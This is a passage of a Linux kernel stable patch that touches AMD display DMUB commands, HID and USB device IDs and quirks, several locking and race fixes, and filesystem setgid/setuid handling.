+ #include "amdgpu_dm_crc.h"
+ struct aux_payload;
++struct set_config_cmd_payload;
+ enum aux_return_code_type;
++enum set_config_status;
+ 
+ /* Forward declarations */
+ struct amdgpu_device;
+@@ -549,6 +551,13 @@ struct amdgpu_display_manager {
+ 	 * occurred on certain intel platform
+ 	 */
+ 	bool aux_hpd_discon_quirk;
++
++	/**
++	 * @dpia_aux_lock:
++	 *
++	 * Guards access to DPIA AUX
++	 */
++	struct mutex dpia_aux_lock;
+ };
+ 
+ enum dsc_clock_force_state {
+@@ -792,9 +801,11 @@ void amdgpu_dm_update_connector_after_detect(
+ 
+ extern const struct drm_encoder_helper_funcs amdgpu_dm_encoder_helper_funcs;
+ 
+-int amdgpu_dm_process_dmub_aux_transfer_sync(bool is_cmd_aux,
+-					struct dc_context *ctx, unsigned int link_index,
+-					void *payload, void *operation_result);
++int amdgpu_dm_process_dmub_aux_transfer_sync(struct dc_context *ctx, unsigned int link_index,
++					struct aux_payload *payload, enum aux_return_code_type *operation_result);
++
++int amdgpu_dm_process_dmub_set_config_sync(struct dc_context *ctx, unsigned int link_index,
++					struct set_config_cmd_payload *payload, enum set_config_status *operation_result);
+ 
+ bool check_seamless_boot_capability(struct amdgpu_device *adev);
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
+index 16623f73ddbe6..57454967617f8 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
+@@ -844,9 +844,8 @@ int dm_helper_dmub_aux_transfer_sync(
+ 		struct aux_payload *payload,
+ 		enum aux_return_code_type *operation_result)
+ {
+-	return amdgpu_dm_process_dmub_aux_transfer_sync(true, ctx,
+-			link->link_index, (void *)payload,
+-			(void *)operation_result);
++	return amdgpu_dm_process_dmub_aux_transfer_sync(ctx, link->link_index, payload,
++			operation_result);
+ }
+ 
+ int dm_helpers_dmub_set_config_sync(struct dc_context *ctx,
+@@ -854,9 +853,8 @@ int dm_helpers_dmub_set_config_sync(struct dc_context *ctx,
+ 		struct set_config_cmd_payload *payload,
+ 		enum set_config_status *operation_result)
+ {
+-	return amdgpu_dm_process_dmub_aux_transfer_sync(false, ctx,
+-			link->link_index, (void *)payload,
+-			(void *)operation_result);
++	return amdgpu_dm_process_dmub_set_config_sync(ctx, link->link_index, payload,
++			operation_result);
+ }
+ 
+ void dm_set_dcn_clocks(struct dc_context *ctx, struct dc_clocks *clks)
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.c
+index a0741794db62a..8e824dc81dede 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.c
+@@ -391,3 +391,27 @@ void dcn314_set_pixels_per_cycle(struct pipe_ctx *pipe_ctx)
+ 		pipe_ctx->stream_res.stream_enc->funcs->set_input_mode(pipe_ctx->stream_res.stream_enc,
+ 				pix_per_cycle);
+ }
++
++void dcn314_hubp_pg_control(struct dce_hwseq *hws, unsigned int hubp_inst, bool power_on)
++{
++	struct dc_context *ctx = hws->ctx;
++	union dmub_rb_cmd cmd;
++
++	if (hws->ctx->dc->debug.disable_hubp_power_gate)
++		return;
++
++	PERF_TRACE();
++
++	memset(&cmd, 0, sizeof(cmd));
++	cmd.domain_control.header.type = DMUB_CMD__VBIOS;
++	cmd.domain_control.header.sub_type = DMUB_CMD__VBIOS_DOMAIN_CONTROL;
++	cmd.domain_control.header.payload_bytes = sizeof(cmd.domain_control.data);
++	cmd.domain_control.data.inst = hubp_inst;
++	cmd.domain_control.data.power_gate = !power_on;
++
++	dc_dmub_srv_cmd_queue(ctx->dmub_srv, &cmd);
++	dc_dmub_srv_cmd_execute(ctx->dmub_srv);
++	dc_dmub_srv_wait_idle(ctx->dmub_srv);
++
++	PERF_TRACE();
++}
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.h b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.h
+index 244280298212c..c419d3dbdfee6 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.h
+@@ -41,4 +41,6 @@ unsigned int dcn314_calculate_dccg_k1_k2_values(struct pipe_ctx *pipe_ctx, unsig
+ 
+ void dcn314_set_pixels_per_cycle(struct pipe_ctx *pipe_ctx);
+ 
++void dcn314_hubp_pg_control(struct dce_hwseq *hws, unsigned int hubp_inst, bool power_on);
++
+ #endif /* __DC_HWSS_DCN314_H__ */
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_init.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_init.c
+index 5b6c2d94ec71d..343f4d9dd5e34 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_init.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_init.c
+@@ -137,7 +137,7 @@ static const struct hwseq_private_funcs dcn314_private_funcs = {
+ 	.plane_atomic_disable = dcn20_plane_atomic_disable,
+ 	.plane_atomic_power_down = dcn10_plane_atomic_power_down,
+ 	.enable_power_gating_plane = dcn314_enable_power_gating_plane,
+-	.hubp_pg_control = dcn31_hubp_pg_control,
++	.hubp_pg_control = dcn314_hubp_pg_control,
+ 	.program_all_writeback_pipes_in_tree = dcn30_program_all_writeback_pipes_in_tree,
+ 	.update_odm = dcn314_update_odm,
+ 	.dsc_pg_control = dcn314_dsc_pg_control,
+diff --git a/drivers/gpu/drm/amd/display/dmub/inc/dmub_cmd.h b/drivers/gpu/drm/amd/display/dmub/inc/dmub_cmd.h
+index 7a8f61517424c..27a4ea7dc74ec 100644
+--- a/drivers/gpu/drm/amd/display/dmub/inc/dmub_cmd.h
++++ b/drivers/gpu/drm/amd/display/dmub/inc/dmub_cmd.h
+@@ -450,6 +450,10 @@ enum dmub_cmd_vbios_type {
+ 	 * Query DP alt status on a transmitter.
+ 	 */
+ 	DMUB_CMD__VBIOS_TRANSMITTER_QUERY_DP_ALT  = 26,
++	/**
++	 * Controls domain power gating
++	 */
++	DMUB_CMD__VBIOS_DOMAIN_CONTROL = 28,
+ };
+ 
+ //==============================================================================
+@@ -1191,6 +1195,23 @@ struct dmub_rb_cmd_dig1_transmitter_control {
+ 	union dmub_cmd_dig1_transmitter_control_data transmitter_control; /**< payload */
+ };
+ 
++/**
++ * struct dmub_rb_cmd_domain_control_data - Data for DOMAIN power control
++ */
++struct dmub_rb_cmd_domain_control_data {
++	uint8_t inst : 6; /**< DOMAIN instance to control */
++	uint8_t power_gate : 1; /**< 1=power gate, 0=power up */
++	uint8_t reserved[3]; /**< Reserved for future use */
++};
++
++/**
++ * struct dmub_rb_cmd_domain_control - Controls DOMAIN power gating
++ */
++struct dmub_rb_cmd_domain_control {
++	struct dmub_cmd_header header; /**< header */
++	struct dmub_rb_cmd_domain_control_data data; /**< payload */
++};
++
+ /**
+  * DPIA tunnel command parameters.
+  */
+@@ -3187,6 +3208,10 @@ union dmub_rb_cmd {
+ 	 * Definition of a DMUB_CMD__VBIOS_DIG1_TRANSMITTER_CONTROL command.
+ 	 */
+ 	struct dmub_rb_cmd_dig1_transmitter_control dig1_transmitter_control;
++	/**
++	 * Definition of a DMUB_CMD__VBIOS_DOMAIN_CONTROL command.
++	 */
++	struct dmub_rb_cmd_domain_control domain_control;
+ 	/**
+ 	 * Definition of a DMUB_CMD__PSR_SET_VERSION command.
+ 	 */
+diff --git a/drivers/hid/hid-core.c b/drivers/hid/hid-core.c
+index 3e1803592bd4a..5c72aef3d3dd5 100644
+--- a/drivers/hid/hid-core.c
++++ b/drivers/hid/hid-core.c
+@@ -1202,6 +1202,7 @@ int hid_open_report(struct hid_device *device)
+ 	__u8 *end;
+ 	__u8 *next;
+ 	int ret;
++	int i;
+ 	static int (*dispatch_type[])(struct hid_parser *parser,
+ 				      struct hid_item *item) = {
+ 		hid_parser_main,
+@@ -1252,6 +1253,8 @@ int hid_open_report(struct hid_device *device)
+ 		goto err;
+ 	}
+ 	device->collection_size = HID_DEFAULT_NUM_COLLECTIONS;
++	for (i = 0; i < HID_DEFAULT_NUM_COLLECTIONS; i++)
++		device->collection[i].parent_idx = -1;
+ 
+ 	ret = -EINVAL;
+ 	while ((next = fetch_item(start, end, &item)) != NULL) {
+diff --git a/drivers/hid/hid-elecom.c b/drivers/hid/hid-elecom.c
+index e59e9911fc370..4fa45ee77503b 100644
+--- a/drivers/hid/hid-elecom.c
++++ b/drivers/hid/hid-elecom.c
+@@ -12,6 +12,7 @@
+  *  Copyright (c) 2017 Alex Manoussakis <amanou@gnu.org>
+  *  Copyright (c) 2017 Tomasz Kramkowski <tk@the-tk.com>
+  *  Copyright (c) 2020 YOSHIOKA Takuma <lo48576@hard-wi.red>
++ *  Copyright (c) 2022 Takahiro Fujii <fujii@xaxxi.net>
+  */
+ 
+ /*
+@@ -89,7 +90,7 @@ static __u8 *elecom_report_fixup(struct hid_device *hdev, __u8 *rdesc,
+ 	case USB_DEVICE_ID_ELECOM_M_DT1URBK:
+ 	case USB_DEVICE_ID_ELECOM_M_DT1DRBK:
+ 	case USB_DEVICE_ID_ELECOM_M_HT1URBK:
+-	case USB_DEVICE_ID_ELECOM_M_HT1DRBK:
++	case USB_DEVICE_ID_ELECOM_M_HT1DRBK_010D:
+ 		/*
+ 		 * Report descriptor format:
+ 		 * 12: button bit count
+@@ -99,6 +100,16 @@ static __u8 *elecom_report_fixup(struct hid_device *hdev, __u8 *rdesc,
+ 		 */
+ 		mouse_button_fixup(hdev, rdesc, *rsize, 12, 30, 14, 20, 8);
+ 		break;
++	case USB_DEVICE_ID_ELECOM_M_HT1DRBK_011C:
++		/*
++		 * Report descriptor format:
++		 * 22: button bit count
++		 * 30: padding bit count
++		 * 24: button report size
++		 * 16: button usage maximum
++		 */
++		mouse_button_fixup(hdev, rdesc, *rsize, 22, 30, 24, 16, 8);
++		break;
+ 	}
+ 	return rdesc;
+ }
+@@ -112,7 +123,8 @@ static const struct hid_device_id elecom_devices[] = {
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_ELECOM, USB_DEVICE_ID_ELECOM_M_DT1URBK) },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_ELECOM, USB_DEVICE_ID_ELECOM_M_DT1DRBK) },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_ELECOM, USB_DEVICE_ID_ELECOM_M_HT1URBK) },
+-	{ HID_USB_DEVICE(USB_VENDOR_ID_ELECOM, USB_DEVICE_ID_ELECOM_M_HT1DRBK) },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_ELECOM, USB_DEVICE_ID_ELECOM_M_HT1DRBK_010D) },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_ELECOM, USB_DEVICE_ID_ELECOM_M_HT1DRBK_011C) },
+ 	{ }
+ };
+ MODULE_DEVICE_TABLE(hid, elecom_devices);
+diff --git a/drivers/hid/hid-ids.h b/drivers/hid/hid-ids.h
+index 0f8c11842a3a5..9e36b4cd905ee 100644
+--- a/drivers/hid/hid-ids.h
++++ b/drivers/hid/hid-ids.h
+@@ -413,6 +413,8 @@
+ #define I2C_DEVICE_ID_HP_ENVY_X360_15T_DR100	0x29CF
+ #define I2C_DEVICE_ID_HP_ENVY_X360_EU0009NV	0x2CF9
+ #define I2C_DEVICE_ID_HP_SPECTRE_X360_15	0x2817
++#define I2C_DEVICE_ID_HP_SPECTRE_X360_13_AW0020NG  0x29DF
++#define I2C_DEVICE_ID_ASUS_TP420IA_TOUCHSCREEN 0x2BC8
+ #define USB_DEVICE_ID_ASUS_UX550VE_TOUCHSCREEN	0x2544
+ #define USB_DEVICE_ID_ASUS_UX550_TOUCHSCREEN	0x2706
+ #define I2C_DEVICE_ID_SURFACE_GO_TOUCHSCREEN	0x261A
+@@ -428,7 +430,8 @@
+ #define USB_DEVICE_ID_ELECOM_M_DT1URBK	0x00fe
+ #define USB_DEVICE_ID_ELECOM_M_DT1DRBK	0x00ff
+ #define USB_DEVICE_ID_ELECOM_M_HT1URBK	0x010c
+-#define USB_DEVICE_ID_ELECOM_M_HT1DRBK	0x010d
++#define USB_DEVICE_ID_ELECOM_M_HT1DRBK_010D	0x010d
++#define USB_DEVICE_ID_ELECOM_M_HT1DRBK_011C	0x011c
+ 
+ #define USB_VENDOR_ID_DREAM_CHEEKY	0x1d34
+ #define USB_DEVICE_ID_DREAM_CHEEKY_WN	0x0004
+diff --git a/drivers/hid/hid-input.c b/drivers/hid/hid-input.c
+index 3ee5a9fea20e6..7e94ca1822afb 100644
+--- a/drivers/hid/hid-input.c
++++ b/drivers/hid/hid-input.c
+@@ -370,6 +370,8 @@ static const struct hid_device_id hid_battery_quirks[] = {
+ 	{ HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_LOGITECH,
+ 		USB_DEVICE_ID_LOGITECH_DINOVO_EDGE_KBD),
+ 	  HID_BATTERY_QUIRK_IGNORE },
++	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_ASUS_TP420IA_TOUCHSCREEN),
++	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_ELAN, USB_DEVICE_ID_ASUS_UX550_TOUCHSCREEN),
+ 	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_ELAN, USB_DEVICE_ID_ASUS_UX550VE_TOUCHSCREEN),
+@@ -384,6 +386,8 @@ static const struct hid_device_id hid_battery_quirks[] = {
+ 	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_HP_SPECTRE_X360_15),
+ 	  HID_BATTERY_QUIRK_IGNORE },
++	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_HP_SPECTRE_X360_13_AW0020NG),
++	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_SURFACE_GO_TOUCHSCREEN),
+ 	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_SURFACE_GO2_TOUCHSCREEN),
+diff --git a/drivers/hid/hid-quirks.c b/drivers/hid/hid-quirks.c
+index be3ad02573de8..5bc91f68b3747 100644
+--- a/drivers/hid/hid-quirks.c
++++ b/drivers/hid/hid-quirks.c
+@@ -393,7 +393,8 @@ static const struct hid_device_id hid_have_special_driver[] = {
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_ELECOM, USB_DEVICE_ID_ELECOM_M_DT1URBK) },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_ELECOM, USB_DEVICE_ID_ELECOM_M_DT1DRBK) },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_ELECOM, USB_DEVICE_ID_ELECOM_M_HT1URBK) },
+-	{ HID_USB_DEVICE(USB_VENDOR_ID_ELECOM, USB_DEVICE_ID_ELECOM_M_HT1DRBK) },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_ELECOM, USB_DEVICE_ID_ELECOM_M_HT1DRBK_010D) },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_ELECOM, USB_DEVICE_ID_ELECOM_M_HT1DRBK_011C) },
+ #endif
+ #if IS_ENABLED(CONFIG_HID_ELO)
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_ELO, 0x0009) },
+diff --git a/drivers/infiniband/hw/hfi1/user_exp_rcv.c b/drivers/infiniband/hw/hfi1/user_exp_rcv.c
+index b02f2f0809c81..350884d5f0896 100644
+--- a/drivers/infiniband/hw/hfi1/user_exp_rcv.c
++++ b/drivers/infiniband/hw/hfi1/user_exp_rcv.c
+@@ -160,16 +160,11 @@ static void unpin_rcv_pages(struct hfi1_filedata *fd,
+ static int pin_rcv_pages(struct hfi1_filedata *fd, struct tid_user_buf *tidbuf)
+ {
+ 	int pinned;
+-	unsigned int npages;
++	unsigned int npages = tidbuf->npages;
+ 	unsigned long vaddr = tidbuf->vaddr;
+ 	struct page **pages = NULL;
+ 	struct hfi1_devdata *dd = fd->uctxt->dd;
+ 
+-	/* Get the number of pages the user buffer spans */
+-	npages = num_user_pages(vaddr, tidbuf->length);
+-	if (!npages)
+-		return -EINVAL;
+-
+ 	if (npages > fd->uctxt->expected_count) {
+ 		dd_dev_err(dd, "Expected buffer too big\n");
+ 		return -EINVAL;
+@@ -196,7 +191,6 @@ static int pin_rcv_pages(struct hfi1_filedata *fd, struct tid_user_buf *tidbuf)
+ 		return pinned;
+ 	}
+ 	tidbuf->pages = pages;
+-	tidbuf->npages = npages;
+ 	fd->tid_n_pinned += pinned;
+ 	return pinned;
+ }
+@@ -274,6 +268,7 @@ int hfi1_user_exp_rcv_setup(struct hfi1_filedata *fd,
+ 	mutex_init(&tidbuf->cover_mutex);
+ 	tidbuf->vaddr = tinfo->vaddr;
+ 	tidbuf->length = tinfo->length;
++	tidbuf->npages = num_user_pages(tidbuf->vaddr, tidbuf->length);
+ 	tidbuf->psets = kcalloc(uctxt->expected_count, sizeof(*tidbuf->psets),
+ 				GFP_KERNEL);
+ 	if (!tidbuf->psets) {
+diff --git a/drivers/pinctrl/pinctrl-amd.c b/drivers/pinctrl/pinctrl-amd.c
+index 9bc6e3922e78e..32c3edaf90385 100644
+--- a/drivers/pinctrl/pinctrl-amd.c
++++ b/drivers/pinctrl/pinctrl-amd.c
+@@ -365,6 +365,7 @@ static void amd_gpio_dbg_show(struct seq_file *s, struct gpio_chip *gc)
+ 
+ 			} else {
+ 				debounce_enable = "  ∅";
++				time = 0;
+ 			}
+ 			snprintf(debounce_value, sizeof(debounce_value), "%u", time * unit);
+ 			seq_printf(s, "debounce %s (🕑 %sus)| ", debounce_enable, debounce_value);
+diff --git a/drivers/tty/vt/vc_screen.c b/drivers/tty/vt/vc_screen.c
+index f566eb1839dc5..71e091f879f0e 100644
+--- a/drivers/tty/vt/vc_screen.c
++++ b/drivers/tty/vt/vc_screen.c
+@@ -403,10 +403,11 @@ vcs_read(struct file *file, char __user *buf, size_t count, loff_t *ppos)
+ 		unsigned int this_round, skip = 0;
+ 		int size;
+ 
+-		ret = -ENXIO;
+ 		vc = vcs_vc(inode, &viewed);
+-		if (!vc)
+-			goto unlock_out;
++		if (!vc) {
++			ret = -ENXIO;
++			break;
++		}
+ 
+ 		/* Check whether we are above size each round,
+ 		 * as copy_to_user at the end of this loop
+diff --git a/drivers/usb/core/hub.c b/drivers/usb/core/hub.c
+index 0aaaadb02cc69..1abe43ddb75f0 100644
+--- a/drivers/usb/core/hub.c
++++ b/drivers/usb/core/hub.c
+@@ -2389,9 +2389,8 @@ static int usb_enumerate_device_otg(struct usb_device *udev)
+  * usb_enumerate_device - Read device configs/intfs/otg (usbcore-internal)
+  * @udev: newly addressed device (in ADDRESS state)
+  *
+- * This is only called by usb_new_device() and usb_authorize_device()
+- * and FIXME -- all comments that apply to them apply here wrt to
+- * environment.
++ * This is only called by usb_new_device() -- all comments that apply there
++ * apply here wrt to environment.
+  *
+  * If the device is WUSB and not authorized, we don't attempt to read
+  * the string descriptors, as they will be errored out by the device
+diff --git a/drivers/usb/core/sysfs.c b/drivers/usb/core/sysfs.c
+index 631574718d8ac..ccf6cd9722693 100644
+--- a/drivers/usb/core/sysfs.c
++++ b/drivers/usb/core/sysfs.c
+@@ -868,11 +868,7 @@ read_descriptors(struct file *filp, struct kobject *kobj,
+ 	size_t srclen, n;
+ 	int cfgno;
+ 	void *src;
+-	int retval;
+ 
+-	retval = usb_lock_device_interruptible(udev);
+-	if (retval < 0)
+-		return -EINTR;
+ 	/* The binary attribute begins with the device descriptor.
+ 	 * Following that are the raw descriptor entries for all the
+ 	 * configurations (config plus subsidiary descriptors).
+@@ -897,7 +893,6 @@ read_descriptors(struct file *filp, struct kobject *kobj,
+ 			off -= srclen;
+ 		}
+ 	}
+-	usb_unlock_device(udev);
+ 	return count - nleft;
+ }
+ 
+diff --git a/drivers/usb/dwc3/dwc3-pci.c b/drivers/usb/dwc3/dwc3-pci.c
+index 89c9ab2b19f85..a23ddbb819795 100644
+--- a/drivers/usb/dwc3/dwc3-pci.c
++++ b/drivers/usb/dwc3/dwc3-pci.c
+@@ -47,6 +47,7 @@
+ #define PCI_DEVICE_ID_INTEL_ADLS		0x7ae1
+ #define PCI_DEVICE_ID_INTEL_RPL			0xa70e
+ #define PCI_DEVICE_ID_INTEL_RPLS		0x7a61
++#define PCI_DEVICE_ID_INTEL_MTLM		0x7eb1
+ #define PCI_DEVICE_ID_INTEL_MTLP		0x7ec1
+ #define PCI_DEVICE_ID_INTEL_MTL			0x7e7e
+ #define PCI_DEVICE_ID_INTEL_TGL			0x9a15
+@@ -467,6 +468,9 @@ static const struct pci_device_id dwc3_pci_id_table[] = {
+ 	{ PCI_VDEVICE(INTEL, PCI_DEVICE_ID_INTEL_RPLS),
+ 	  (kernel_ulong_t) &dwc3_pci_intel_swnode, },
+ 
++	{ PCI_VDEVICE(INTEL, PCI_DEVICE_ID_INTEL_MTLM),
++	  (kernel_ulong_t) &dwc3_pci_intel_swnode, },
++
+ 	{ PCI_VDEVICE(INTEL, PCI_DEVICE_ID_INTEL_MTLP),
+ 	  (kernel_ulong_t) &dwc3_pci_intel_swnode, },
+ 
+diff --git a/drivers/usb/gadget/function/u_serial.c b/drivers/usb/gadget/function/u_serial.c
+index 7538279f98179..db6fd0238d4b4 100644
+--- a/drivers/usb/gadget/function/u_serial.c
++++ b/drivers/usb/gadget/function/u_serial.c
+@@ -81,6 +81,9 @@
+ #define WRITE_BUF_SIZE		8192		/* TX only */
+ #define GS_CONSOLE_BUF_SIZE	8192
+ 
++/* Prevents race conditions while accessing gser->ioport */
++static DEFINE_SPINLOCK(serial_port_lock);
++
+ /* console info */
+ struct gs_console {
+ 	struct console		console;
+@@ -1374,8 +1377,10 @@ void gserial_disconnect(struct gserial *gser)
+ 	if (!port)
+ 		return;
+ 
++	spin_lock_irqsave(&serial_port_lock, flags);
++
+ 	/* tell the TTY glue not to do I/O here any more */
+-	spin_lock_irqsave(&port->port_lock, flags);
++	spin_lock(&port->port_lock);
+ 
+ 	gs_console_disconnect(port);
+ 
+@@ -1390,7 +1395,8 @@ void gserial_disconnect(struct gserial *gser)
+ 			tty_hangup(port->port.tty);
+ 	}
+ 	port->suspended = false;
+-	spin_unlock_irqrestore(&port->port_lock, flags);
++	spin_unlock(&port->port_lock);
++	spin_unlock_irqrestore(&serial_port_lock, flags);
+ 
+ 	/* disable endpoints, aborting down any active I/O */
+ 	usb_ep_disable(gser->out);
+@@ -1424,10 +1430,19 @@ EXPORT_SYMBOL_GPL(gserial_suspend);
+ 
+ void gserial_resume(struct gserial *gser)
+ {
+-	struct gs_port *port = gser->ioport;
++	struct gs_port *port;
+ 	unsigned long	flags;
+ 
+-	spin_lock_irqsave(&port->port_lock, flags);
++	spin_lock_irqsave(&serial_port_lock, flags);
++	port = gser->ioport;
++
++	if (!port) {
++		spin_unlock_irqrestore(&serial_port_lock, flags);
++		return;
++	}
++
++	spin_lock(&port->port_lock);
++	spin_unlock(&serial_port_lock);
+ 	port->suspended = false;
+ 	if (!port->start_delayed) {
+ 		spin_unlock_irqrestore(&port->port_lock, flags);
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index 6b69d05e2fb06..a8534065e0d6d 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -402,6 +402,8 @@ static void option_instat_callback(struct urb *urb);
+ #define LONGCHEER_VENDOR_ID			0x1c9e
+ 
+ /* 4G Systems products */
++/* This one was sold as the VW and Skoda "Carstick LTE" */
++#define FOUR_G_SYSTEMS_PRODUCT_CARSTICK_LTE	0x7605
+ /* This is the 4G XS Stick W14 a.k.a. Mobilcom Debitel Surf-Stick *
+  * It seems to contain a Qualcomm QSC6240/6290 chipset            */
+ #define FOUR_G_SYSTEMS_PRODUCT_W14		0x9603
+@@ -1976,6 +1978,8 @@ static const struct usb_device_id option_ids[] = {
+ 	  .driver_info = RSVD(2) },
+ 	{ USB_DEVICE(AIRPLUS_VENDOR_ID, AIRPLUS_PRODUCT_MCD650) },
+ 	{ USB_DEVICE(TLAYTECH_VENDOR_ID, TLAYTECH_PRODUCT_TEU800) },
++	{ USB_DEVICE(LONGCHEER_VENDOR_ID, FOUR_G_SYSTEMS_PRODUCT_CARSTICK_LTE),
++	  .driver_info = RSVD(0) },
+ 	{ USB_DEVICE(LONGCHEER_VENDOR_ID, FOUR_G_SYSTEMS_PRODUCT_W14),
+ 	  .driver_info = NCTRL(0) | NCTRL(1) },
+ 	{ USB_DEVICE(LONGCHEER_VENDOR_ID, FOUR_G_SYSTEMS_PRODUCT_W100),
+diff --git a/drivers/usb/typec/pd.c b/drivers/usb/typec/pd.c
+index dc72005d68db9..b5ab26422c349 100644
+--- a/drivers/usb/typec/pd.c
++++ b/drivers/usb/typec/pd.c
+@@ -161,7 +161,6 @@ static struct device_type source_fixed_supply_type = {
+ 
+ static struct attribute *sink_fixed_supply_attrs[] = {
+ 	&dev_attr_dual_role_power.attr,
+-	&dev_attr_usb_suspend_supported.attr,
+ 	&dev_attr_unconstrained_power.attr,
+ 	&dev_attr_usb_communication_capable.attr,
+ 	&dev_attr_dual_role_data.attr,
+diff --git a/fs/attr.c b/fs/attr.c
+index 1552a5f23d6b3..b45f30e516fad 100644
+--- a/fs/attr.c
++++ b/fs/attr.c
+@@ -18,6 +18,70 @@
+ #include <linux/evm.h>
+ #include <linux/ima.h>
+ 
++#include "internal.h"
++
++/**
++ * setattr_should_drop_sgid - determine whether the setgid bit needs to be
++ *                            removed
++ * @mnt_userns:	user namespace of the mount @inode was found from
++ * @inode:	inode to check
++ *
++ * This function determines whether the setgid bit needs to be removed.
++ * We retain backwards compatibility and require setgid bit to be removed
++ * unconditionally if S_IXGRP is set. Otherwise we have the exact same
++ * requirements as setattr_prepare() and setattr_copy().
++ *
++ * Return: ATTR_KILL_SGID if setgid bit needs to be removed, 0 otherwise.
++ */
++int setattr_should_drop_sgid(struct user_namespace *mnt_userns,
++			     const struct inode *inode)
++{
++	umode_t mode = inode->i_mode;
++
++	if (!(mode & S_ISGID))
++		return 0;
++	if (mode & S_IXGRP)
++		return ATTR_KILL_SGID;
++	if (!in_group_or_capable(mnt_userns, inode,
++				 i_gid_into_vfsgid(mnt_userns, inode)))
++		return ATTR_KILL_SGID;
++	return 0;
++}
++
++/**
++ * setattr_should_drop_suidgid - determine whether the set{g,u}id bit needs to
++ *                               be dropped
++ * @mnt_userns:	user namespace of the mount @inode was found from
++ * @inode:	inode to check
++ *
++ * This function determines whether the set{g,u}id bits need to be removed.
++ * If the setuid bit needs to be removed ATTR_KILL_SUID is returned. If the
++ * setgid bit needs to be removed ATTR_KILL_SGID is returned. If both
++ * set{g,u}id bits need to be removed the corresponding mask of both flags is
++ * returned.
++ *
++ * Return: A mask of ATTR_KILL_S{G,U}ID indicating which - if any - setid bits
++ * to remove, 0 otherwise.
++ */
++int setattr_should_drop_suidgid(struct user_namespace *mnt_userns,
++				struct inode *inode)
++{
++	umode_t mode = inode->i_mode;
++	int kill = 0;
++
++	/* suid always must be killed */
++	if (unlikely(mode & S_ISUID))
++		kill = ATTR_KILL_SUID;
++
++	kill |= setattr_should_drop_sgid(mnt_userns, inode);
++
++	if (unlikely(kill && !capable(CAP_FSETID) && S_ISREG(mode)))
++		return kill;
++
++	return 0;
++}
++EXPORT_SYMBOL(setattr_should_drop_suidgid);
++
+ /**
+  * chown_ok - verify permissions to chown inode
+  * @mnt_userns:	user namespace of the mount @inode was found from
+@@ -140,8 +204,7 @@ int setattr_prepare(struct user_namespace *mnt_userns, struct dentry *dentry,
+ 			vfsgid = i_gid_into_vfsgid(mnt_userns, inode);
+ 
+ 		/* Also check the setgid bit! */
+-		if (!vfsgid_in_group_p(vfsgid) &&
+-		    !capable_wrt_inode_uidgid(mnt_userns, inode, CAP_FSETID))
++		if (!in_group_or_capable(mnt_userns, inode, vfsgid))
+ 			attr->ia_mode &= ~S_ISGID;
+ 	}
+ 
+@@ -251,9 +314,8 @@ void setattr_copy(struct user_namespace *mnt_userns, struct inode *inode,
+ 		inode->i_ctime = attr->ia_ctime;
+ 	if (ia_valid & ATTR_MODE) {
+ 		umode_t mode = attr->ia_mode;
+-		vfsgid_t vfsgid = i_gid_into_vfsgid(mnt_userns, inode);
+-		if (!vfsgid_in_group_p(vfsgid) &&
+-		    !capable_wrt_inode_uidgid(mnt_userns, inode, CAP_FSETID))
++		if (!in_group_or_capable(mnt_userns, inode,
++					 i_gid_into_vfsgid(mnt_userns, inode)))
+ 			mode &= ~S_ISGID;
+ 		inode->i_mode = mode;
+ 	}
+@@ -375,7 +437,7 @@ int notify_change(struct user_namespace *mnt_userns, struct dentry *dentry,
+ 		}
+ 	}
+ 	if (ia_valid & ATTR_KILL_SGID) {
+-		if ((mode & (S_ISGID | S_IXGRP)) == (S_ISGID | S_IXGRP)) {
++		if (mode & S_ISGID) {
+ 			if (!(ia_valid & ATTR_MODE)) {
+ 				ia_valid = attr->ia_valid |= ATTR_MODE;
+ 				attr->ia_mode = inode->i_mode;
+diff --git a/fs/btrfs/send.c b/fs/btrfs/send.c
+index 1c4b693ee4a3a..937b60ae576e0 100644
